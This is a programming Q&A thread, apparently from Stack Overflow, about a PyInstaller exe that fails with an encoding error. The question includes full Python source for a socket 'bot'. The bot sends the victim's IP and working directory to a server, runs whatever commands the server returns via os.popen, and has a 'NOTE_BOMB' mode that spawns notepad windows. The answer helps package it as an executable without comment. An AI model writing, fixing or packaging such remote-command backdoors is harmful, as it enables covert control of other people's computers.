# I am reciving an error for pyinstaller, conversion from py to exe works fine but there is an error when i try to open it

Tags: python, python-3.x, sockets, operating-system

I have been trying to turn my first sockets project as an exe but for some reason when i try to load it is shows me an error. The error is impossible to see in the python console but you can see it in the cmd prompt.If you need me to show you the pyinstaller resulst pls tell me.

error:

```
C:\WINDOWS\system32\output\client>client.exe
Python path configuration:
  PYTHONHOME = 'C:\WINDOWS\system32\output\client'
  PYTHONPATH = (not set)
  program name = 'C:\WINDOWS\system32\output\client\client.exe'
  isolated = 0
  environment = 0
  user site = 0
  import site = 0
  sys._base_executable = 'C:\\WINDOWS\\system32\\output\\client\\client.exe'
  sys.base_prefix = ''
  sys.base_exec_prefix = ''
  sys.executable = 'C:\\WINDOWS\\system32\\output\\client\\client.exe'
  sys.prefix = ''
  sys.exec_prefix = ''
  sys.path = [
    'C:\\WINDOWS\\system32\\output\\client\\base_library.zip',
    'C:\\WINDOWS\\system32\\output\\client',
  ]
Fatal Python error: init_fs_encoding: failed to get the Python codec of the filesystem encoding
Python runtime state: core initialized
LookupError: unknown encoding: utf-8

Current thread 0x00006558 (most recent call first):
<no Python frame>
```

code:

```
import socket
import os

client_ip = socket.gethostbyname(socket.gethostname())
class Client:
    def __init__(self):
        self.host = '127.0.0.1'
        self.port = 6758
        self.server = socket.socket()

    def connect(self):
        self.server.connect((self.host,self.port))

    def send(self,text):
        self.server.send(str(text).encode('UTF-8'))

    def recv(self):
        self.msg = self.server.recv(1024)
        return self.msg.decode('UTF-8')

class Operate:
    def __init__(self):
        self.serv = Client()
        self.serv.connect()
        
    def hack(self):
        self.serv.send('{0} , {1} > '.format(client_ip,str(os.getcwd())))
        self.msg = self.serv.recv()
        if self.msg.split(' ')[0] == 'NOTE_BOMB':
            for i in range(int(self.msg.split(' ')[1])):
                data = os.popen('notepad.exe')

        else:
            data = os.popen(self.msg)
        self.serv.send('recived : '+str(data.read()))

run = True

bot = Operate()
while run:
    bot.hack()
```

Answer (score 0):

First of all i would recommend not to convert .py file to .exe(because python is a interpreting language ,its not a good practice) but if you want to do and as you have said that you converted it into .exe using pyinstaller but it didn't work there can be multiple reasons:

1:You didn't make the .exe file correctly.in this case try remaking the .exe file with pyinstaller --onefile filename.py

2:your pyinstaller isn't installed correctly,try reinstalling pyinstaller(i converted your code into exe on my pc and it works ).